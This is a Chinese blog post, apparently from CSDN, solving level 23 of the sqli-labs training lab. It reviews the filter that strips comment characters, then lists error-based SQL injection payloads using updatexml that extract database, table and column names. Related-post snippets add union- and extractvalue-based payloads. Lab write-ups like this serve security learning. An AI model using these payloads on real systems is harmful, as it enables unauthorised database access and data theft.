sqli-labs23

最新推荐文章于 2023-08-03 13:41:06 发布
最新推荐文章于 2023-08-03 13:41:06 发布
阅读量140 收藏
点赞数
分类专栏: sql-labs 文章标签: sql sqli-labs database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53030229/article/details/124967537
版权

文章目录

一、审查源码

这里我就捡重要的代码挑出来说一下

preg_replace 函数执行一个正则表达式的搜索和替换,将reg里面内容替换为空
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

二、 SQL注入

1、获取数据库

?id=-1'  and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

在这里插入图片描述

2、获取数据表

?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1

3、获取字段

?id=-1'  and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users'),0x7e),1) and '1'='1

在这里插入图片描述

ter_ret
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-23(sqli-labs闯关指南 23)—Advanced injection
m0_54899775的博客
12-23 1187
sqli-labs Less-23(sqli-labs闯关指南 23)
sqli-labs(23)
mmzkyl的博客
01-29 259
本关卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制 先测试下面这两个payload: http://192.168.2.60/sqli-labs/Less-23?id=1'# http://192.168.2.60/sqli-labs/Less-23?id=1'--+ 若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面 # 与 --均被过滤,本题最大的难题便是无法通过注释来注释掉多余的单引号,总而无法完成注入,使用上面两个pay
Sqlilabs-23
KAKA的博客
07-14 544
第 23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫: http://sqlilabs/Less-23/?id=1' and '1 知道了原理构造起来就很简单了: –查表 http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1 简化: .
SQL-labs的第23关——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 202
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
(手工)【sqli-labs23】联合查询+报错回显
07-11 358
【SQL-联合查询+报错回显】
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
安装sqli-labs
10-22
安装sqli-labs
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1135
sqli-labs,sql注入
sqli-labs-master第23关
m_ing
05-17 1119
前言:从一开始我们是GET-----POST的路线来研究sql注入,这关我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
Sqli-labs之Less-23
→_→
04-18 664
Less-23 基于错误的,过滤注释的GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
sqli-labs(23-37)
qq_43395215的博客
08-26 402
文章目录第23关:第24关:第25关:第26关:第27关:第28关:第29关:第30关:第31关:第32关:第33关:第34关:第35关:第36关:第37关: 第23关: 23关感觉和第1关一样,先用第一关的操作试一试,先判断闭合方式 /Less-23/?id=1' and 1=2 --+ 判断所有的闭合方式都是无效,但是在报错信息里面,有关于“’ LIMIT 0,1’的提示,按理说不应该出现才对,因为我们注入的sql语句后面有注释符,这一部分应该是被注释的,所以应该是注释被屏蔽了,所以我们采用另一种构造
sqli-labs less23
qq_45106794的博客
10-26 222
#sqli-labs less 23 这一关的与第一关的区别有两个,一个是注释符# --+被过滤了 所以我们得闭合第二个单引号 另一个区别是不能用order by 来判断字段数了 具体原因请参照 https://www.jianshu.com/p/2602430f8ee4 ’ union select 1,2,3,4 or ‘1’='1 ’ union select 1,version(),3 o...
Sqli-Lab | Less 21-23
酉酉的博客
02-08 565
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
sqli-labs--23-37关通关指南(详细)
weixin_44576725的博客
11-14 1354
文章目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28aLess-29背景知识:正题:Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37总结Less-37总结 前言:本节开始对advanced injections关卡进行通关记录,23-38关 在这里补充一下信息收集的命令: @@version 数据库版本 @@datadir 数据库数据路径 @
sqli-labs 23-25a关闯关心得与思路
m0_48294281的博客
04-18 226
sqli-labs 23-25a关闯关心得与思路
sqli-labs:23/25-28,绕waf
weixin_30929295的博客
03-24 131
sqli23: and|or型报错 ' or extractvalue(1,concat(0x7e,database())) or '1'='1 union型嵌套select ' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3 转载于:ht...
sqli-labs29
最新发布
04-21
sqli-labs是一个用于学习和实践SQL注入的实验平台,它提供了一系列具有不同难度级别的SQL注入漏洞场景。sqli-labs29是其中的一个具体场景,它主要涉及到基于时间的盲注(Blind Time-Based Injection)。 在sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值